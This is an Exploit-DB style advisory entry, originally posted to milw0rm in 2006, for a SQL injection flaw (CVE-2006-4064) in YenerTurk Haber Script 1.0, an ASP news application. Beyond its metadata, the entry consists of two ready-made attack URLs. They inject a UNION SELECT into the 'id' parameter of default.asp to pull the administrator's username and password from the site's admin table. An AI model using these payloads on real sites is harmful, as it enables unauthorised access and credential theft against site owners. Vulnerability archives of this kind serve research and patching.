EXPLOITS

YenerTurk Haber Script 1.0 - SQL Injection

Author: ASIANEAGLE
type: webapps
platform: asp
port: 
date_added: 2006-08-06  
date_updated:   
verified: 1  
codes: OSVDB-27825;CVE-2006-4064  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2138.txt  

#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org


#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201

# milw0rm.com [2006-08-07]